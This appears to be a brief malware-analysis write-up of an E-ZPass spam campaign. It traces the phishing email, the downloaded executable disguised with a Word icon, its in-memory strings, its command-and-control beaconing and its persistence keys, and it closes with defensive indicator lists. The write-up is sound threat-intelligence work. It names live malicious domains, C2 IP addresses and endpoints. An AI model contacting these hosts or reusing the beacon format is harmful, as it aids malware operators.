EZPass Spam Analysis

A quick breakdown of the stages of infection for E-ZPass spam.

Delivery:

Received a spam email with subject "Indebted for driving on toll road"

"Get Invoice" links to automuzika[.]lv/search.php?to=lx/[random chars]/[random chars]/qQ

Exploitation:

When the user clicks the Get Invoice link, a zip file is downloaded that seems to be dynamically named based on the downloaders location. In my case the zip file I received contained a file called E-ZPASS_[mytown]_[myzipcode].exe.
MD5 hash of the exe:

7ccebc21af323547c17325943ed8f300 

The extracted file, when placed on the desktop uses a Microsoft Word icon to trick the user into thinking it's a document file.

Installation:

7ccebc21af323547c17325943ed8f300 seems to be a non-packed executable. When run it leaves an abandoned svchost.exe process.
Looking at the strings in memory with Process Hacker shows:

0xfe388, 13, For base!!!!!
0xfe398, 18, http://%[^:]:%d/%s
0xfe3b0, 72, Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
0xfe404, 49, Content-Type: application/x-www-form-urlencoded
0xfe438, 11, svchost.exe
0xfe53c, 19, %1024[^=]=%1024[^;]
0xfe778, 153, <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
0xff014, 12, You fag!!!!!
0xff108, 14, For group!!!!!
0x100048, 276, -----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDh1cXNl5TSGcC5OrnDBc+fdN/0
PblnZEAOlryK65eKdaNAIi0okxHTfCHKZQWEz8LOzQRclzg+SilO+jbesgZg/Y7U
c8edpo93cM0eyVE7Pi5n73I/lLyvD/gDby80FQmj1sbayyHR2DG8heeJJ2TRTfzD
r6V/45jRqvvUfgl+swIDAQAB
-----END PUBLIC KEY-----
0x100560, 18, 1.0.6, 6-Sept-2010
0x1be780, 30, 112.124.126.139 
0x2b8a38, 36, http[:]//112.124.126.139:443/index.php 
0x2b8ac8, 34, 46.4.105.170:8080
0x2b8b28, 38, 112.124.126.139:443
0x2b8dfa, 28, 12.124.126.139
0x2d86b8, 68, http://46.4.105.170:8080/index.php
0x2d86b8, 68, http://46.4.105.170:8080/index.php
0xa29818, 42, C:\Users\IEUser\AppData\Local\ikxohwnh.exe
0xa2e840, 14, nonenonenone
Command and Control:

Beacons to several IPs over port 443 and port 8080.

112.124.126.139:443
212.129.21.210:443
46.4.105.170:8080
95.110.147.192:8080
162.13.189.52:8080
173.199.182.152:8080
192.254.138.62:8080
193.46.84.84:8080
205.134.239.167:8080

Example of Contents:

POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Host: 46.4.105.170:8080
Content-Length: 310
Cache-Control: no-cache

....*w.PI... ..l+i...9..1...#vh..Y......x..7
..j....?..i..P.M..4...\K...&U&.o..C
x..
...ml.]...p'Ib......=..D[X...q."T.q..Xv..Q.~z1&......=..
x..... FL.^Q....W[..a..........R'.'..q..........LF..*..wS.Le....=........#K..YA...$....M..x.....|..!._g...1\..o.MVd..v..^`...m.e....Q[R.~g..../>..x.R...Y.H..K.:$.{...p0

Mitigations & Detections:

Host IOCs:

Abandoned svchost process with strings from above.

C:\Users\[username]\AppData\Local\[random chars].exe

Persistence Keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wnquanxa
HKCU\Software\euubsgsu\tcdstcsd
Network IOCs:

Email Address:

manager@gcalternativas.com

URIs:
POST requests to...

http[:]//[ip]:443/index.php
http[:]//[ip]:8080/index.php

IPs:

85.31.97.194 (automuzika)
112.124.126.139:443
212.129.21.210:443
46.4.105.170:8080
95.110.147.192:8080
162.13.189.52:8080
173.199.182.152:8080
192.254.138.62:8080
193.46.84.84:8080
205.134.239.167:8080

FQDNs:

automuzika.lv

Mutexes:

abUser
aaUser
Additional Analysis

Malwr.com analysis 7ccebc21af323547c17325943ed8f300